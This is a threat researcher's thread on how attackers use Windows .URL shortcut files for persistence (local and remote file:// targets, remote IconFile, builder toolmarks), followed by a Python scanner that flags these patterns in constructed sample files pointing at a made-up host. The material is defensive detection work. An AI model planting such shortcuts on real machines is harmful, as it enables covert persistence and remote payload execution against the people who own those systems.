Thread by Nick Carr, 11 tweets, 20 min read
@Hexacorn @cglyer @HackingDave @DerbyCon This was a technique largely outside of my typical purview - thanks for the context @Hexacorn!

Here are some rules 📏 & in-the-wild history 📆 to share for .url persistence.

Rules: gist.github.com/itsreallynick/… (CC @cyb3rops)

A quick history on the two kinds of .URL files so far...
The reason for the two rules is the options
URL=file:///<local file>
*and*
URL=file://<remote resource URL>

I liked the second one more
As with all Windows scripting techniques, there are no doubt creative launch methods to replace "file://" here that are worth exploring 🤔
Quick history time!
(I didn't undertake a retrohunt, basing this on info at-hand)

🔍URL=file:///<local file>

At some point in ~2017 "local" .url persistence was added to commercial backdoors
Example 2017-05-03 06:07:14 (.iso dropper) virustotal.com/gui/file/8b9da…
...
Around the same time we have BOTH:
1⃣the awesome @Hexacorn blog (hexacorn.com/blog/2018/02/0…) - I still love that hotkey technique! 🥵🔑
2⃣the adoption of remote/SMB resources for .url persistence
🔍URL=file://<remote resource URL>
Example 2018-03-13 10:47:05
virustotal.com/gui/file/93f22…
This was a quick search on when it was *popularized*, so it'd be interesting to retrohunt back to when truly *first seen*...

BTW: I liked the .img self-extracting archive trick the most - though both techniques appear to have been used by the commercial RAT devs for a bit
There's definitely a broader spectrum of .URL anomalies to explore.
I'll tinker more & provide some updated rules

As a preview, here is a bad guy's .url builder toolmark:
✅IconFile=C:\Windows\system32\shell32.dll
🙈IconFile=C:\Windows\system32\SHELL32.dl

"CCE_20180427_###.URL"
TIL .url files can have remotely hosted IconFiles

🔍IconFile=<attacker-controlled infrastructure>

I wonder if this would provide web log analytics on successful .url persistence? #probablyinteresting

Updated yara rule: gist.github.com/itsreallynick/…
If you broaden and look at who was using these prior to 2017, it gets pretty interesting.

Take a glimpse* at this creative XLS we obtained in 2014, establishing .URL persistence, checks on startup paths, & fun web functions including Google Translate.

*unable to share sample 😧
⬆️ If you can get past the .URL persistence & malicious payload, Sheet1 is an otherwise helpful working translation spreadsheet

这是什么意思 ("What does this mean?") indeed.
Despite MSFT lacking good docs for .URL files, today I found a 1998 post, "Unofficial Guide to the URL File Format": lyberty.com/encyc/articles…

#DFIR will enjoy the "Modified" field.

I wondered if BaseURL can be abused. So far looks like no? Turns out this field is super rare though.
Pictured: an Excel sheet macro that drops a .URL with a "mailto:" link 📨

If you can baseline what's expected in a file format, you can find anomalies. No mega finds on .URLs today, but I hope I inspired someone to be curious. 👍🏽

All yara rules are here: gist.github.com/itsreallynick/…
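The thread points at YARA rules on a gist but does not reproduce them. Below is an added, standalone Python example (my own code, not the author's rules or anything from the gist) that pulls the thread's observations together into one triage scanner: it parses the [InternetShortcut] section, classifies the URL= target into the two forms the two rules cover (file:///<local file> vs. file://<remote resource>) plus the mailto: variant, flags a remotely hosted IconFile= and the truncated "SHELL32.dl" builder toolmark, notes a rare BaseURL=, and decodes the Modified= field that the 1998 guide documents (8-byte little-endian FILETIME followed by one checksum byte equal to the sum of the first 8 bytes mod 256). The sample .url contents, host 203.0.113.10, file names and timestamps are all constructed for the example; the finding labels are my own naming, not anything from the thread.

```python
"""Triage scanner for .url (InternetShortcut) files. Example code, not the thread's YARA rules."""
import re
from datetime import datetime, timedelta, timezone
from urllib.parse import urlsplit

FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)
DRIVE_RE = re.compile(r"^[A-Za-z]:")  # C:\... style target


def parse_url_file(text):
    """Return [InternetShortcut] keys (lower-cased) -> values.
    First duplicate wins, the way GetPrivateProfileString resolves repeated keys."""
    fields, section = {}, None
    for raw in text.lstrip("\ufeff").splitlines():  # tolerate a UTF-8 BOM
        line = raw.strip()
        if not line or line[0] in ";#":
            continue
        if line[0] == "[" and line[-1] == "]":
            section = line[1:-1].strip().lower()
            continue
        if section == "internetshortcut" and "=" in line:
            key, _, value = line.partition("=")
            fields.setdefault(key.strip().lower(), value.strip())
    return fields


def classify_url(url):
    """Return local-file | remote-file | web | mailto | other for a URL= value."""
    url = url.strip()
    if DRIVE_RE.match(url):                      # bare C:\path, no scheme at all
        return "local-file"
    parts = urlsplit(url)
    scheme = parts.scheme.lower()
    if scheme == "file":
        # file://host/share/x, file:////host/share/x and file:///\\host\share\x
        # all make the host reach out over SMB/WebDAV; file://C:\x is still local.
        if parts.netloc and not DRIVE_RE.match(parts.netloc):
            return "remote-file"
        if parts.path.startswith(("//", "/\\\\")):
            return "remote-file"
        return "local-file"
    return {"http": "web", "https": "web", "mailto": "mailto"}.get(scheme, "other")


def iconfile_findings(icon):
    findings = []
    if icon.startswith("\\\\") or "://" in icon:  # icon fetched from attacker infra
        findings.append("iconfile-remote")
    name = re.split(r"[\\/]", icon)[-1]
    if name.lower().endswith(".dl"):             # 'SHELL32.dl' instead of 'shell32.dll'
        findings.append("iconfile-truncated-dll")
    return findings


def encode_modified(when):
    """Build a Modified= value from a datetime (used here only to construct samples)."""
    if when.tzinfo is None:
        when = when.replace(tzinfo=timezone.utc)
    ticks = (when - FILETIME_EPOCH) // timedelta(microseconds=1) * 10  # 100 ns units
    raw = ticks.to_bytes(8, "little")
    return (raw + bytes([sum(raw) % 256])).hex().upper()


def decode_modified(value):
    """Return the UTC datetime, or None if the field is malformed or its checksum is wrong."""
    try:
        raw = bytes.fromhex(value.strip())
    except ValueError:
        return None
    if len(raw) != 9 or sum(raw[:8]) % 256 != raw[8]:
        return None
    return FILETIME_EPOCH + timedelta(microseconds=int.from_bytes(raw[:8], "little") // 10)


def analyze(text):
    """Return {'findings': [...], 'modified': datetime|None, 'fields': {...}} for one .url file."""
    fields, findings = parse_url_file(text), []
    if "url" not in fields:
        findings.append("no-url")
    else:
        kind = classify_url(fields["url"])
        if kind != "web":
            findings.append("url-" + kind)
    if "iconfile" in fields:
        findings.extend(iconfile_findings(fields["iconfile"]))
    if "baseurl" in fields:
        findings.append("baseurl-present")       # rare field, worth a look when present
    modified = decode_modified(fields["modified"]) if "modified" in fields else None
    if "modified" in fields and modified is None:
        findings.append("modified-malformed")
    return {"findings": findings, "modified": modified, "fields": fields}


# Constructed samples (made-up hosts, paths and timestamp), not real-world artifacts.
SAMPLE_WEB = "[InternetShortcut]\r\nURL=https://example.com/\r\nIconFile=C:\\Windows\\system32\\shell32.dll\r\nIconIndex=0\r\n"
SAMPLE_LOCAL = ("\ufeff[InternetShortcut]\r\nURL=file:///C:/Users/Public/Libraries/update.vbs\r\nModified="
                + encode_modified(datetime(2018, 4, 27, 9, 30, tzinfo=timezone.utc)) + "\r\n")
SAMPLE_REMOTE = "[InternetShortcut]\r\nURL=file://203.0.113.10/public/client.exe\r\nIconFile=http://203.0.113.10/icon.ico\r\nBaseURL=http://203.0.113.10/\r\n"
SAMPLE_TOOLMARK = "[InternetShortcut]\r\nURL=file://203.0.113.10/public/client.exe\r\nIconFile=C:\\Windows\\system32\\SHELL32.dl\r\nIconIndex=3\r\n"
SAMPLE_MAILTO = "[InternetShortcut]\r\nURL=mailto:someone@example.com\r\n"

if __name__ == "__main__":
    for label, text in [("web", SAMPLE_WEB), ("local", SAMPLE_LOCAL), ("remote", SAMPLE_REMOTE),
                        ("toolmark", SAMPLE_TOOLMARK), ("mailto", SAMPLE_MAILTO)]:
        result = analyze(text)
        print(f"{label:9} findings={result['findings']} modified={result['modified']}")
```

Pointing this at a Startup folder (`%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup`) and reading each .url as text is enough to reproduce the two rule cases; the checksum on Modified= means a hand-edited timestamp shows up as `modified-malformed` rather than as a plausible date.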